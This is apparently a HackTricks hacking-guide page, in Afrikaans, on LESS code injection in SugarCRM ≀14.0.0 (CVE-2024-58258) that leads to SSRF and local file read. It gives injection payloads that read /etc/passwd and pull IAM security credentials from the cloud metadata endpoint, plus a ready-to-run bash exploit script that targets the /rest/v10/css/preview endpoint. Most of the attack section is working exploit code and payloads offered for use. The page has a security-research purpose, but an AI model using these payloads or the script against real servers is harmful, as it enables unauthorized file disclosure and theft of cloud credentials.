SSRF Kwetsbare Platforme
Reading time: 4 minutes
tip
Leer en oefen AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking:  HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking:
Leer en oefen Azure Hacking:  HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die đŹ Discord groep of die telegram groep of volg ons op Twitter đŠ @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
Kyk na https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/
LESS Code Injection leading to SSRF & Local File Read
LESS is 'n gewilde CSS pre-processor wat variables, mixins, functions en die kragtige @import directive byvoeg. Tydens samestelling sal die LESS engine die bronne wat in @import verwys word haal en hul inhoud ("inline") in die resulterende CSS inbedding wanneer die (inline) opsie gebruik word.
Wanneer 'n toepassing user-controlled input aan 'n string heg wat later deur die LESS compiler geparse word, kan 'n aanvaller inject arbitrary LESS code. Deur @import (inline) te misbruik kan die aanvaller die server dwing om op te haal:
- Plaaslike lĂȘers via die file://protocol (information disclosure / Local File Inclusion).
- Remote resources on internal networks or cloud metadata services (SSRF).
Hierdie tegniek is in die werklike wĂȘreld gesien in produkte soos SugarCRM †14.0.0 (/rest/v10/css/preview endpoint).
Uitbuiting
- Identifiseer 'n parameter wat direk ingebed is in 'n stylesheet-string wat deur die LESS engine verwerk word (bv. ?lm=in SugarCRM).
- Sluit die huidige verklaring en injecteer nuwe direkteiewe. Die mees algemene primitiewe is:
- ;â beĂŻndig die vorige deklarasie.
- }â sluit die vorige blok (indien nodig).
- Gebruik @import (inline) '<URL>';om arbitrĂȘre bronne te lees.
- Opsioneel injecteer 'n marker (data:URI) na die import om die uittrekking van die opgehaalde inhoud uit die saamgestelde CSS te vergemaklik.
Local File Read
1; @import (inline) 'file:///etc/passwd';
@import (inline) 'data:text/plain,@@END@@'; //
Die inhoud van /etc/passwd sal in die HTTP-antwoord verskyn net voor die @@END@@ merker.
SSRF â Wolk-metadata
1; @import (inline) "http://169.254.169.254/latest/meta-data/iam/security-credentials/";
@import (inline) 'data:text/plain,@@END@@'; //
Geoutomatiseerde PoC (SugarCRM voorbeeld)
#!/usr/bin/env bash
# Usage: ./exploit.sh http://target/sugarcrm/ /etc/passwd
TARGET="$1"        # Base URL of SugarCRM instance
RESOURCE="$2"      # file:// path or URL to fetch
INJ=$(python -c "import urllib.parse,sys;print(urllib.parse.quote_plus(\"1; @import (inline) '$RESOURCE'; @import (inline) 'data:text/plain,@@END@@';//\"))")
curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \
sed -n 's/.*@@END@@\(.*\)/\1/p'
Werklike Gevalle
| Produk | Kwetsbare Eindpunt | Gevolg | 
|---|---|---|
| SugarCRM †14.0.0 | /rest/v10/css/preview?lm= | Ongeauthentiseerde SSRF en lees van plaaslike lĂȘers | 
Verwysings
- SugarCRM †14.0.0 (css/preview) LESS Code Injection Vulnerability
- SugarCRM Security Advisory SA-2024-059
- CVE-2024-58258
tip
Leer en oefen AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking:  HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking:
Leer en oefen Azure Hacking:  HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die đŹ Discord groep of die telegram groep of volg ons op Twitter đŠ @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
 HackTricks
HackTricks